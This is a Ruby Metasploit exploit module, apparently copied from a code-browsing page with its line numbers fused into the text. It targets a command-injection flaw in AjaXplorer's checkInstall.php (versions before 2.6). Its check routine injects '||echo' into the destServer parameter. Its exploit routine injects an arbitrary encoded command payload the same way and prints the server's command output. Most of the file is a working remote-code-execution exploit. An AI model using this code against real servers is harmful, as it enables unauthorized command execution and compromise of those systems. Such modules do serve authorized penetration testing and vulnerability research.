Path: blob/master/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
19512 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'AjaXplorer checkInstall.php Remote Command Execution',15'Description' => %q{16This module exploits an arbitrary command execution vulnerability in the17AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to182.6 are vulnerable.19},20'Author' => [21'Julien Cayssol', # Credited according to SecurityFocus22'David Maciejak', # Metasploit module23'sinn3r' # Final touch on the Metasploit module24],25'License' => MSF_LICENSE,26'References' => [27[ 'OSVDB', '63552' ],28[ 'BID', '39334' ]29],30'Privileged' => false,31'Payload' => {32'DisableNops' => true,33'Space' => 512,34'Compat' =>35{36'ConnectionType' => 'find',37'PayloadType' => 'cmd',38'RequiredCmd' => 'generic perl ruby python telnet'39}40},41'Platform' => %w{bsd linux osx unix win},42'Arch' => ARCH_CMD,43'Targets' => [[ 'AjaXplorer 2.5.5 or older', {}]],44'DisclosureDate' => '2010-04-04',45'DefaultTarget' => 0,46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51)52)5354register_options(55[56OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/'])57]58)59end6061def check62uri = target_uri.path63uri << '/' if uri[-1, 1] != '/'64clue = Rex::Text::rand_text_alpha(rand(5) + 5)6566res = send_request_cgi({67'method' => 'GET',68'uri' => normalize_uri(uri, 'plugins/access.ssh/checkInstall.php'),69'vars_get' => {70'destServer' => "||echo #{clue}"71}72})7374# If the server doesn't return the default redirection, probably something is wrong75if res and res.code == 200 and res.body =~ /#{clue}/76return Exploit::CheckCode::Vulnerable77end7879return Exploit::CheckCode::Safe80end8182def exploit83peer = "#{rhost}:#{rport}"84uri = target_uri.path8586# Trigger the command execution bug87res = send_request_cgi({88'method' => 'GET',89'uri' => normalize_uri(uri, "plugins/access.ssh/checkInstall.php"),90'vars_get' =>91{92'destServer' => "||#{payload.encoded}"93}94})9596if res97print_status("The server returned: #{res.code} #{res.message}")98m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || ''99100if m.empty?101print_error("This server may not be vulnerable")102else103print_status("Command output from the server:")104print_line(m)105end106end107end108end109110=begin111Repo:112http://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/2.6/113=end114115116